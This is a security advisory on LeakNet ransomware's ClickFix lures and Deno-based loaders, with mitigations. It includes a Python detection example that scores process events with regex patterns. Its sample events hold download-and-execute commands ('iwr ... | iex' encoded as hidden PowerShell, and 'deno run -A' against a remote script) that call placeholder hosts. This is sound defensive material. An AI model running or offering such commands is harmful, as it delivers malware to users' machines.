LeakNet Ransomware Uses Clickfix and Deno Runtime for Stealthy Attacks
Summary:
The "ClickFix" technique has rapidly transitioned from a novel social engineering trick into a highly industrialized threat vector. At its core, ClickFix exploits "verification fatigue" by presenting users with fake browser errors, CAPTCHAs, or software update prompts. Unlike traditional malware that relies on a user downloading and double-clicking a file, ClickFix instructs the victim to manually execute malicious code. Typically, the lure provides a "Fix It" button that copies an obfuscated PowerShell command to the user's clipboard and then provides step-by-step instructions to open the Windows Run dialog (Win+R) and paste the command (Ctrl+V). This bypasses many traditional browser security controls and email gateways because the "malicious" action, the execution, is performed by a trusted user through a legitimate system utility.
Recent developments show threat actors scaling this method through the "LeakNet" ecosystem and the adoption of "Deno", a modern, secure runtime for JavaScript and TypeScript, as a delivery vehicle. By leveraging Deno, attackers can wrap their malicious scripts in a legitimate-looking, signed executable that is less likely to trigger traditional AV signatures than raw PowerShell scripts or older Python-based loaders. This "Casting a Wider Net" approach signifies a shift toward Malware-as-a-Service (MaaS), where lower-tier affiliates can now deploy sophisticated, multi-stage infection chains that deliver infostealers like Lumma, Vidar, or Rhadamanthys with minimal technical effort.
Security Officer Comments:
The surge in ClickFix activity represents a significant shift in the "Initial Access" landscape. The impact of this threat is particularly acute because it weaponizes the very tools, like PowerShell and the Run command, that IT administrators and power users rely on daily. Because the technique relies on user-assisted execution, it effectively nullifies the protection provided by "Mark of the Web" (MotW) and other file-download restrictions that many organizations have spent years hardening.
For organizations within our community, a successful ClickFix infection is rarely the end of the road; it is almost always the precursor to credential theft or ransomware. Once an infostealer is executed via this method, it can harvest session cookies, bypassing Multi-Factor Authentication (MFA) through session hijacking. For organizations, this means that even "secure" accounts are at risk if an employee falls for a fake Google Meet or Zoom error message. Furthermore, the move toward using Deno-based loaders indicates that adversaries are actively seeking ways to circumvent EDR (Endpoint Detection and Response) tools by using "Living-off-the-Runtime" (LotR) techniques, necessitating a shift in focus from file-based detection to behavioral monitoring of system utilities.
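The behavioural angle argued above can be put into a concrete triage rule: ClickFix ends with the victim pasting a command into the Run dialog, so the tell-tale is the process tree (explorer.exe spawning a script interpreter with download-and-execute or encoded arguments), not a file hash. The following is an added example, not code from the original bulletin or the linked article; it scores constructed Sysmon Event ID 1 style records with placeholder URLs, and the field names and thresholds are assumptions.

```python
# Added example (not from the bulletin): constructed Sysmon-style records, placeholder URLs.
import base64
import re

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "deno.exe"}
DOWNLOAD_EXEC = re.compile(r"invoke-webrequest|\biwr\b|invoke-expression|\biex\b|downloadstring|https?://", re.I)
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_FLAG = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b", re.I)

def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind a PowerShell -EncodedCommand argument, or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(ev):
    """Score one process-creation record: each independent ClickFix trait adds one point."""
    image, parent = (ev[k].rsplit("\\", 1)[-1].lower() for k in ("Image", "ParentImage"))
    if image not in INTERPRETERS:
        return 0, []
    reasons, cmd = [], ev["CommandLine"]
    decoded = decode_encoded_command(cmd)
    if decoded:
        reasons.append("encoded command")
        cmd += " " + decoded                 # judge the decoded content as well
    if parent == "explorer.exe":             # the Run dialog (Win+R) is hosted by explorer.exe
        reasons.append("interpreter spawned by explorer.exe")
    if DOWNLOAD_EXEC.search(cmd):
        reasons.append("download-and-execute pattern")
    if HIDDEN_FLAG.search(cmd):
        reasons.append("hidden/no-profile flags")
    return len(reasons), reasons

def flag_clickfix(events, threshold=2):
    """Return (ProcessId, score, reasons) for records at or above the threshold."""
    return [s for s in ((ev["ProcessId"],) + score_event(ev) for ev in events) if s[1] >= threshold]

def _ev(pid, parent, image, cmd):
    return {"ProcessId": pid, "ParentImage": parent, "Image": image, "CommandLine": cmd}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_PAYLOAD = "iwr http://lure.example.invalid/v | iex"          # constructed, benign placeholder
SAMPLE_B64 = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    _ev(1001, r"C:\Windows\explorer.exe", PS, "powershell -w hidden -enc " + SAMPLE_B64),
    _ev(1002, r"C:\Windows\System32\svchost.exe", PS, r"powershell.exe -NoLogo -File C:\scripts\backup.ps1"),
    _ev(1003, r"C:\Windows\explorer.exe", r"C:\Users\u\AppData\Local\deno\deno.exe", "deno.exe run -A https://cdn.example.invalid/update.ts"),
]
```

Run against the samples, `flag_clickfix(SAMPLE_EVENTS)` flags the explorer-spawned PowerShell and Deno records and leaves the scheduled backup script alone; in production the same logic would consume Sysmon or Security 4688 events with command-line auditing enabled.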
Suggested Corrections:
LeakNet is shortening the path from initial access to lateral movement by relying less on Initial Access Brokers (IABs) and running its own ClickFix lures. The actions below focus on preventing the initial access and lateral movement associated with LeakNet.
- Block Newly Registered Domains: C2 domains associated with this campaign are usually only a few weeks old. Newly registered domains are rarely needed for business operations, and blocking them makes it significantly harder for threat actors to stand up new infrastructure.
- Block users from using Win+R: Regular non-technical users should not have access to the Run dialog (Win+R) on their Windows workstations.
- Prevent PsExec use by unauthorized users: Regular non-technical users should not be able to run PsExec. Create a Group Policy Object (GPO) that restricts its use to authorized administrators.
Link(s):
https://www.bleepingcomputer.com/ne...ickfix-and-deno-runtime-for-stealthy-attacks/